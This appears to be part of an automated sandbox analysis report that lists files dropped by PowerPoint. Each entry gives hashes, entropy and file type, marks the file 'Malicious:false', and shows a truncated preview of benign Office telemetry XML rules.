                                                                                                                              MD5:240DF33199F5A724037519C5908B65A7
                                                                                                                              SHA1:5D062DDFC922C14335850E165D9406E63CBFEFDA
                                                                                                                              SHA-256:356AAA22D2155107BC47EE1245A25ADF3D5680032EC1AA94083A51E807743D0A
                                                                                                                              SHA-512:5FB9C690737F3B205B725D131FA7AD1470CA452FA765C01818B6E129730F6A3882743A6121AB15B2171CB7E27956ADAD8F02CABDF29489953F7D775ADCB43C50
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="230161" V="0" DC="SM" EN="Office.ClickToRun.MsoMigrate" ATT="0da1917aa56040d3a011c3813ca36107-76f080d8-b37f-4635-8054-5c133fcd04c4-6587" S="3" DCa="PSP" xmlns="">.. <S>.. <UTS T="1" Id="c5n43" />.. <UTS T="2" Id="c5n44" />.. <UTS T="3" Id="c5n45" />.. <UTS T="4" Id="c5n46" />.. <US T="5">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </US>.. </S>.. <C T="TAG" I="0" O="true" N="EventID">.. <S T="5" F="ULS_Tag" M="Ignore" />.. </C>.. <T>.. <S T="5" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):424
                                                                                                                              Entropy (8bit):5.269047223186581
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdbV/lkzv4tXIGgkahzmhdFoIzoIPc1RMFpAQUHperhIRnyNjxPVCEULylNOQ:TMHdlm46GhMo/VzPAQier8olVg6NO2su
                                                                                                                              MD5:AA2FAAA25958AAD66EF9A72760A3D8C3
                                                                                                                              SHA1:24F7C7539AE86878100102DF93864823C25DF057
                                                                                                                              SHA-256:4A27506CA8B0A89BC0F98A6A3DE43602BF59A0D1D795404D853B689A71A720E4
                                                                                                                              SHA-512:D4A6D53C903C05E02E4C72E232E1C7DB79E85D5A9A2499A9087496089282A0D61B218220FE2416D3196EDBA2585E99975B99A975CFF78798855E98F714378B88
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="23070" V="1" DC="SM" EN="Office.Docs.TempFileDownloadDAVFallback" ATT="c274b3e05ac5448dae8fbb7466da6acb-fd6dc8de-18b7-409c-a696-4bd66f7a5322-7902" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bppa1" A="bwt18" />.. </S>.. <C T="FT" I="0" O="false" N="TimeStamp">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2309
                                                                                                                              Entropy (8bit):4.806434422690667
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dqzLmo/VmrF2rNt4BzTTkA4ycqjcqAcqi0D0cqa2TqqD6AS/inSdnutiXNQfLOE:cqdNms5t4BvTMyJjJAJz0JRWcN0LtC
                                                                                                                              MD5:C8534FCB4EA2C539F7CA6E1E8E1C7809
                                                                                                                              SHA1:29A879D7520662E79B6F72769383D91EA5E03136
                                                                                                                              SHA-256:0958D3B330B3749E80AD67809B05E1072D521B062D4B5FB0DEF22A7EF0C3930A
                                                                                                                              SHA-512:B77F359667F265B03B4310FC4AFBB9FFE68E4E6CC04829D4210233D0594CA26AB13D02CE83FF103559BC248B78EEFC942257959D8D2715444048A2B06222C34F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="23120" V="0" DC="SM" EN="Office.Docs.DocsDesktopSharingSetPaneModeDataContext" ATT="c274b3e05ac5448dae8fbb7466da6acb-fd6dc8de-18b7-409c-a696-4bd66f7a5322-7902" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bf870" />.. <UTS T="2" Id="bf87z" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" />.. </L>.. <R>.. <V V="Desktop Sharing" T="W" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="ULS_Category" />.. </L>.. <R>.. <V V="Scope Summary" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="ScopeInstanceId" />.. </S>.. <S T="4">.. <F N="ScopeInstance" />.. </S>.. </G>.. <C T="U32" I="0" O="true" N="TopActivityInstanceId">.. <S T="4" F="TopActivityInstance" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="ParentActivityInstanceId">.. <S T="4
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1904
                                                                                                                              Entropy (8bit):4.790203622565363
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d+tzL3Ggo/VmrUrmNt4BzTTkA4ycqjcqAcqi0D0cqa2TqqD6AS1W:cE2HNmwKNt4BvTMyJjJAJz0JRWcQW
                                                                                                                              MD5:6291C2EE3D2E6B4DAAC6E9B0E7FD34FF
                                                                                                                              SHA1:D314B31897115BC78328EA5DE0DEE4A253A3695F
                                                                                                                              SHA-256:9C29BAA73D4475971297AD37A3ADDC77BBF7F2A13F2A2EE18F5EC2683610F22D
                                                                                                                              SHA-512:E92644AA2882D2D3DFB7288384BD0CE3C6130338BE469B0185A2F78C2FC7D267F0ADDFF724D4388351C3F49E014A35DD721157DB736B8271A21BB7538F6E0D8F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="23122" V="0" DC="SM" EN="Office.Docs.DocsDesktopSharingOneServiceSelectedDataContext" ATT="c274b3e05ac5448dae8fbb7466da6acb-fd6dc8de-18b7-409c-a696-4bd66f7a5322-7902" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="berpb" />.. <UTS T="2" Id="bf88x" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" />.. </L>.. <R>.. <V V="Desktop Sharing" T="W" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="ULS_Category" />.. </L>.. <R>.. <V V="Scope Summary" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="ScopeInstanceId" />.. </S>.. <S T="4">.. <F N="ScopeInstance" />.. </S>.. </G>.. <C T="U32" I="0" O="true" N="TopActivityInstanceId">.. <S T="4" F="TopActivityInstance" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="ParentActivityInstanceId">..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2011
                                                                                                                              Entropy (8bit):4.815157222080249
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dgMko/VmrIWrft4BzTTkA4ycqjcqAcqi0D0cqa2TqqD6AS/5Kpb2:cbNm8WTt4BvTMyJjJAJz0JRWcOb
                                                                                                                              MD5:C23D14A85B03CB6FDEC64A9D73126B96
                                                                                                                              SHA1:6FC92AD8A24AD0D69F8A258D4FB33AA5B1F4AD77
                                                                                                                              SHA-256:F76F19346BF12641AE0AE5187AE3148DBC4EF3DCCB772036B6881BDAB0FCCB83
                                                                                                                              SHA-512:EBDE2F58654B2D8CAF2430A65C9342BB8BFFA8A85500AFC4A81EC4153911DD425EDF920D93220FD2D00EB928A072F940850F1A1956E6C0DB92B74149D93A2461
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="23123" V="0" DC="SM" EN="Office.Docs.DocsDesktopCreateTokenizedLinkDataContext" ATT="c274b3e05ac5448dae8fbb7466da6acb-fd6dc8de-18b7-409c-a696-4bd66f7a5322-7902" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bf88r" />.. <UTS T="2" Id="bf88q" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" />.. </L>.. <R>.. <V V="Desktop Sharing" T="W" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="ULS_Category" />.. </L>.. <R>.. <V V="Scope Summary" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="ScopeInstanceId" />.. </S>.. <S T="4">.. <F N="ScopeInstance" />.. </S>.. </G>.. <C T="U32" I="0" O="true" N="TopActivityInstanceId">.. <S T="4" F="TopActivityInstance" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="ParentActivityInstanceId">.. <S T="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2040
                                                                                                                              Entropy (8bit):4.827858462335743
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dyp8o/VmrlWrEt4BzTTkA4ycqjcqAcqi0D0cqa2TqqD6AS/wFqkpb2:cyNNmZWwt4BvTMyJjJAJz0JRWcap
                                                                                                                              MD5:89C6B778AC67FFE1055D41F62C675E09
                                                                                                                              SHA1:A252660457B39EF1527310F2DD5E8CE5DEE1454D
                                                                                                                              SHA-256:DA6FEB5AC33D112CE01EB5DEA1C2A120F666F3244E4A867B8D85C8822254A7B2
                                                                                                                              SHA-512:78EFEB1491944AB89F7DC72772D35772897F6FD5E9ABC7AAB5E32E86F2CC54E18DBE1AEF6539AF2EF0D5FCD1788448801245C53796017F542F24D7D40B29B16B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="23124" V="0" DC="SM" EN="Office.Docs.DocsDesktopClickToChangePermissionsDataContext" ATT="c274b3e05ac5448dae8fbb7466da6acb-fd6dc8de-18b7-409c-a696-4bd66f7a5322-7902" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bf88u" />.. <UTS T="2" Id="bf88t" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" />.. </L>.. <R>.. <V V="Desktop Sharing" T="W" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="ULS_Category" />.. </L>.. <R>.. <V V="Scope Summary" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="ScopeInstanceId" />.. </S>.. <S T="4">.. <F N="ScopeInstance" />.. </S>.. </G>.. <C T="U32" I="0" O="true" N="TopActivityInstanceId">.. <S T="4" F="TopActivityInstance" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="ParentActivityInstanceId">.. <
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1890
                                                                                                                              Entropy (8bit):4.786432532959283
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2duxo/VmrxrTt4BzTTkA4ycqjcqAcqi0D0cqa2TqqD6AS/Ld:cLNm9Pt4BvTMyJjJAJz0JRWcC
                                                                                                                              MD5:0B50F5EFC61FDC3105D7AC294828D74E
                                                                                                                              SHA1:56C075506F59B963E236916DD5ECDEE56E5D0FA9
                                                                                                                              SHA-256:74D905587FA5E1EE6FB3ACFDD64C8A3BBFD00FAB7A3237D16D2EDEFB253E728D
                                                                                                                              SHA-512:42A2CFF46A745583EF904383E4F5C2698110DC4021EF588C9CF23A7607EA25350BC6AC7D81DDFCD1ACA5BE985E6052615ECF5851AE77E88924E3B4CB60E8202E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="23125" V="0" DC="SM" EN="Office.Docs.DocsDesktopUpsellV2SaveAsCompletedDataContext" ATT="c274b3e05ac5448dae8fbb7466da6acb-fd6dc8de-18b7-409c-a696-4bd66f7a5322-7902" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="be9v4" />.. <UTS T="2" Id="berpf" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="ULS_Category" />.. </L>.. <R>.. <V V="Desktop Sharing" T="W" />.. </R>.. </O>.. </F>.. <F T="4">.. <O T="EQ">.. <L>.. <S T="2" F="ULS_Category" />.. </L>.. <R>.. <V V="Scope Summary" T="W" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="ScopeInstanceId" />.. </S>.. <S T="4">.. <F N="ScopeInstance" />.. </S>.. </G>.. <C T="U32" I="0" O="true" N="TopActivityInstanceId">.. <S T="4" F="TopActivityInstance" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="ParentActivityInstanceId">.. <S
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1213
                                                                                                                              Entropy (8bit):4.96243667727836
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dqFl94dVrzqP3F83dIC0b0+9r+RRv+k+KawS:coWVL3d+AQgvFO
                                                                                                                              MD5:AE1487CA7894AAADF2DF6DAFF7850AF9
                                                                                                                              SHA1:53340784FBD1E68FDEAB00CB17799983DAED76F3
                                                                                                                              SHA-256:47289C409A8226AFCA8335D154B664317C6B3F2C676EF331F925C634D02F4B02
                                                                                                                              SHA-512:B69B10650505174732DA1CB8620321DA1419978165534C8E3AF9439C71B7DA1E3C427476208E001C96AE1A1EBA54BE320782EC949E44344AB9C2738673BF37D4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240005" V="8" DC="SM" EN="Office.Security.SrDesktopOpen" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a4sch" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U8" I="1" O="true" N="Reasons">.. <S T="1" F="Reasons" />.. </C>.. <C T="U64" I="2" O="true" N="DocumentPointer">.. <S T="1" F="pioldoc" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="InternetFileSafetyDetail">.. <S T="1" F="InternetFileSafetyDetail" M="Ignore" />.. </C>.. <C T="U8" I="4" O="true" N="Policy">.. <S T="1" F="Policy" M="Ignore" />.. </C>.. <C T="I32" I="5" O="true" N="DirtyFileChangesDecision">.. <S T="1" F="DirtyFileChangesDecision" M="Ignore" />.. </C>.. <C T="W" I="6" O="true" N="OriginalInternetFileSafetyDetail">.. <S T="1" F="OriginalInternetFileSafetyDetail" M="Ignore" />.. </C>.. <C T="W
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):474
                                                                                                                              Entropy (8bit):5.159607339821488
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdLHik2Yl2U4dier1lVh16Z/BZdLINO2su:2dL1l94dVr1Ph43ds
                                                                                                                              MD5:FFBDC6EFC40B3477B5A482908C270646
                                                                                                                              SHA1:EA751B67DFC2437736405CF2F85DC1134B2745B0
                                                                                                                              SHA-256:AE043B642A9CBD9AEFFFD45B123ACB6DC2012AC5A2718FC5FE700794C0B5718F
                                                                                                                              SHA-512:C022837F5C460C44AF31C9C5853597298735DB02EA69601B66A30BDF4C26898A3DE59DD13788C939DFFE39067870762206DE4DE86156391792C1797B95FAA990
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240006" V="2" DC="SM" EN="Office.Security.SrDesktopExit" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a4sci" />.. </S>.. <C T="FT" I="0" O="false" N="UserExit">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U64" I="1" O="true" N="DocumentPointer">.. <S T="1" F="pioldoc" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1489
                                                                                                                              Entropy (8bit):4.819354673822056
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d2yl94dVr1r0rer5rnalv9mKYX1VtFRn4HcgNthXa+vi:c24WVBAK9LY1mKYlTFvCn9i
                                                                                                                              MD5:F52F3D39A79A610FCE9B4410C928A768
                                                                                                                              SHA1:505F2FD7AEE61566A6381D8B56D4B408364996E5
                                                                                                                              SHA-256:68FE5FCA36080DBEF79D8D00AB5344B90E291DBE7591A9C2019641DBE0605767
                                                                                                                              SHA-512:9E298D8F35A19068ED61FECC97ED993699E1BA0D9FF963B7B1DB28329B2EBF8BE54DFB0ED1DE47095CE51F6F6833B7DAABB152D95698E64CA7D6F63AC401941B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240007" V="2" DC="SM" EN="Office.Security.GkDesktop" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a4sca" />.. <UTS T="2" Id="a4sb8" />.. <UTS T="3" Id="a4sb9" />.. <UTS T="4" Id="a4scb" />.. <UTS T="5" Id="a4scc" />.. <US T="6">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. </US>.. </S>.. <C T="TAG" I="0" O="false" N="GkOutcomeTag">.. <S T="6" F="ULS_Tag" />.. </C>.. <C T="U32" I="1" O="true" N="ErrorType">.. <S T="2" F="ErrorType" />.. </C>.. <C T="U32" I="2" O="true" N="Status">.. <S T="2" F="Status" />.. </C>.. <C T="U32" I="3" O="true" N="ContentType">.. <S T="2" F="Content Type" />.. </C>.. <C T="U32" I="4" O="true" N="FileType">.. <S T="2" F="File Type" />.. </C>.. <C T="U32" I="5" O="true" N="ClientData">.. <S T="2" F="Client Data" />.. </C>.. <C T="U32" I="6" O="true" N
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):802
                                                                                                                              Entropy (8bit):4.831014635904131
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdAFEk2Yl2U4dierAfereOerFer9er8erdfCahIffONfSlVZkIu3NOgsu:2dUXl94dVr9rUrwrIrjrdjqPU
                                                                                                                              MD5:F076F619270AE5742F7881FFA396F03B
                                                                                                                              SHA1:7D5BD9147EDF134FDBA28C0D6EB03F928EF857C9
                                                                                                                              SHA-256:21A1E3360449A9A3E3AE39CFF1F2E039DFD8B516C2162C4613AA0D828F16F2F8
                                                                                                                              SHA-512:67E762EA760C570C3C462F68603A25F358E95F35F92A86644449D7C658E1B0A4A49C5AD0E95BB206E88FD44894C3BF589FB8ECA2223E7AE7AA084465CAA01C82
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240008" V="1" DC="SM" EN="Office.Security.IrmDesktopActions" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bb4u1" A="a4sb2" />.. <UTS T="2" Id="bb4u2" A="a4sb3" />.. <UTS T="3" Id="bpcvn" A="a4sb4" />.. <UTS T="4" Id="bpcvm" />.. <UTS T="5" Id="bpcvo" />.. <UTS T="6" Id="bb414" A="a4sb5" />.. <US T="7">.. <S T="1" />.. <S T="2" />.. <S T="3" />.. <S T="4" />.. <S T="5" />.. <S T="6" />.. </US>.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="7" F="TimeStamp100ns" />.. </C>.. <C T="TAG" I="1" O="false" N="IrmActionTag">.. <S T="7" F="ULS_Tag" />.. </C>.. <T>.. <S T="7" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):500
                                                                                                                              Entropy (8bit):5.150720505795691
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdppaak2Yl2U4dierRNMONlVZ6hfIxNO2su:2dpul94dVrRNMONP6Q3
                                                                                                                              MD5:BCFA2EF01CCA654DDCDAEDFE477E2DAC
                                                                                                                              SHA1:DF1EA66A6E59FCFB7AEC7C664107CF0C782FDD16
                                                                                                                              SHA-256:192F75C7B68DA6AF8F8B39B568A0FAE130D140EF84C7CA0A1C7EAF677A090C60
                                                                                                                              SHA-512:EFEBE24DAC077BF3E219D55665477D6D66F680BE8170002AA8D556FCA20AAB10C8E2F4D716FBF5DAAD8D5B86911B45622CCFE284030FF121C6E363483EF2D4B6
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240009" V="3" DC="SM" EN="Office.Security.IrmDesktopTemplate" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bb4vc" A="a4scg a5t8l bb4vc" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="TemplateType">.. <S T="1" F="Template Type" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):672
                                                                                                                              Entropy (8bit):5.13262305364165
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdNMlUZk2Yl2U4dieriIylVZ6dQTPNOATPNyntOR9cs7AlNO2su:2d2lnl94dVrCP0QTTTf9k
                                                                                                                              MD5:43E546ADA277181893A13A7C2803B222
                                                                                                                              SHA1:A0CDEE00B36B9302D8D6560701C3E263CCA947E8
                                                                                                                              SHA-256:AECA2B62689B926986DA02BECBAEB3C85DF5378D1B9411EBF15AFE4362FB527F
                                                                                                                              SHA-512:3225720EB77AFFB0E4D4B87ACEE708AB82905A154CDA493D9E58C30C5B0BB9E6CF07AA9727DBD1AD61C3933B63C99214DC4FD4A20327152439BB9BE6C134726A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240010" V="2" DC="SM" EN="Office.Security.SrDesktopCheck" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a5yzu" A="a529j" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="false" N="PackageFamilyName">.. <S T="1" F="PackageFamilyName" />.. </C>.. <C T="B" I="2" O="false" N="IsTrustedApp">.. <S T="1" F="FTrustedApp" />.. </C>.. <C T="I32" I="3" O="true" N="AppZoneId">.. <S T="1" F="AppZoneId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):688
                                                                                                                              Entropy (8bit):5.0595822943463995
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdMyk2Yl2U4dqAQierqqlVZ6neqqOzyntDI2lm5fNTHNO2su:2dMll94dSrqqP0ogt
                                                                                                                              MD5:93122001BF572AF435DEDCD88758E29F
                                                                                                                              SHA1:F4034C61AEB9517AB8885B33BF60058D17A51386
                                                                                                                              SHA-256:41E168DA3238E4982079F9195411A34A8AA69BE1819F1EDCDF86BDA6CD4863A5
                                                                                                                              SHA-512:5048DAD02B775F890AE0251CF7A74E910CDC3D34C9F5EDDF0A93C95E9A23C80CFB63E22CF8C966B904762FE4CE0864329FD1A6F052FFD16E48AE2A2A538C4A70
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240012" V="1" DC="SM" EN="Office.Security.OTCMacroEncountered" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a7ys8" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="B" I="1" O="false" N="FromInternet">.. <S T="1" F="FromInternet" />.. </C>.. <C T="B" I="2" O="false" N="IsTrusted">.. <S T="1" F="IsTrusted" />.. </C>.. <C T="I32" I="3" O="false" N="TrustCenterSetting">.. <S T="1" F="TrustCenterSetting" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):497
                                                                                                                              Entropy (8bit):5.181641897379635
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdOMk2Yl2U4dqAQierXNlVZ6n4ZSfbuxNO2su:2dO/l94dSrdPPSzu3
                                                                                                                              MD5:DD77E7E84416491F7E2FF60F9F36520C
                                                                                                                              SHA1:DF48489D06269D0DB29A3EC4D0BE13E1E0ED37CE
                                                                                                                              SHA-256:1D960451B96DE1A5E5644541D830018AFE75FC81F2DF98D3E162FB6BD757D2A9
                                                                                                                              SHA-512:B7D22E5B1B7CF70A95BD89B999B9B58780E84C05B722965D23CBA485E6DF5EA1E611575FD195EA1C2F0E6BE101BB55378BBED4DDB9DEF48091B214A67FA2FB70
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240013" V="1" DC="SM" EN="Office.Security.OTCMacroPrompted" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a7ytc" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="B" I="1" O="false" N="PromptType">.. <S T="1" F="PromptType" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):500
                                                                                                                              Entropy (8bit):5.174408507922367
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdM9Drk2Yl2U4dqAQierelVZ6neqqOzyNO2su:2dM9Dkl94dSreP0i
                                                                                                                              MD5:1CF6CB2A93CCF4BF2A0283040B58610A
                                                                                                                              SHA1:CDA72CE1CA8C16CB577C38BBC03E66B8FB674D3F
                                                                                                                              SHA-256:438FDE88478203519A2D58AD0C88F18D06858935A823C111E9E58F14E56D319B
                                                                                                                              SHA-512:3A009B1F31875958032B867AAFD2296B6C530F3CAB6A288FF53BE6FEBA3959012703285808C15AE86595C59880548707906E1880656B5E6A11AA32B3FE8A3C8D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="240014" V="1" DC="SM" EN="Office.Security.OTCMacroEnabled" ATT="05e0c2fd5fff432bac7a175220223da5-2eec7cb2-952b-4862-9fd4-16ed083da5ec-7364" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a7ys7" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="B" I="1" O="false" N="FromInternet">.. <S T="1" F="FromInternet" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):425
                                                                                                                              Entropy (8bit):5.2807690978522235
                                                                                                                              Encrypted:false
